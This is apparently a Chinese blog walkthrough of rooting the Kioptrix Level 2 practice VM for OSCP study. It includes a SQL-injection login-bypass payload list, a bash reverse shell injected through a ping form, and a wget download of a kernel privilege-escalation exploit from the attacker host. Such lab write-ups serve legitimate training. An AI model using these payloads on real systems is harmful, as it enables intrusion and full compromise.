OSCP Kioptrix Level2 靶机渗透

Kioptrix Level2 靶机渗透

目标:得到root权限
作者:shadow
时间:2021-03-13

请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。

一、信息收集

首先扫描靶机ip

netdiscover -i eth0 可见靶机ip为172.16.1.3

OSCP Kioptrix Level2 靶机渗透

nmap查看端口开放情况

nmap -p- -A 172.16.1.3

OSCP Kioptrix Level2 靶机渗透

我们可以看到很多端口都开放了,我们先看看80端口情况,使用浏览器访问80端口

OSCP Kioptrix Level2 靶机渗透

是一个登录页面,我们输入用户名test,密码test点击login,发现并没有验证码之类的,也没有返回任何信息,我们尝试burpsuit是否可以爆破。

OSCP Kioptrix Level2 靶机渗透

设置用户名,密码为参数,填入payload尝试爆破,payload为

'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
' or 1=1 --
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

OSCP Kioptrix Level2 靶机渗透

爆破后发现不同返回值长度,我们来看看返回消息

OSCP Kioptrix Level2 靶机渗透

看似我们好像成功登陆了,复制出request中的账号admin'%20# 密码test尝试登陆,成功登陆

OSCP Kioptrix Level2 靶机渗透

登录后提示让我们ping一下网络,我们尝试ping127.0.0.1试试

OSCP Kioptrix Level2 靶机渗透

由此可见,我们可以在ping命令后连接反弹shell命令来获取shell

本地使用nc监听4444端口

nc -nvlp 4444

同时页面输入127.0.0.1; bash -i >& /dev/tcp/172.16.1.4/4444 0>&1成功获取shell

OSCP Kioptrix Level2 靶机渗透

二、提权

使用python -c 'import pty;pty.spawn("/bin/sh")'

获得交互式shell

OSCP Kioptrix Level2 靶机渗透

查看系统版本看看是否有exploit可以直接提权

lsb_release -a  查看系统型号

uname -a 查看系统版本

OSCP Kioptrix Level2 靶机渗透

该系统为CentOS release 4.5 2.6.9 我们google一下看是否有提权exploit

OSCP Kioptrix Level2 靶机渗透

搜索到提权exploit,我们把它下载下来保存为9545.c ,将它放到/var/www/html目录下

OSCP Kioptrix Level2 靶机渗透

开启本地apache

service apache2 start

再使用受害机进行下载

cd /tmp

wget http://172.16.1.4/9545.c

OSCP Kioptrix Level2 靶机渗透

成功下载,再使用gcc进行编译

gcc 9545.c -o 9545

再赋予9545执行权限

chmod +x 9545
执行9545,成功获得root权限

./9545

OSCP Kioptrix Level2 靶机渗透

三、总结

发现80端口存在未验证漏洞,采用burpsuit进行爆破成功进入

通过调查系统信息获得漏洞成功提权

 

上一篇:Java中常用的API


下一篇:实验三